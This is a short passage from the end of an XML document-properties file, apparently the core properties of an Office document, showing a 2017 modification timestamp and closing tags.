  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-01-01T10:26:28Z</dcterms:modified>
</cp:coreProperties>
</file>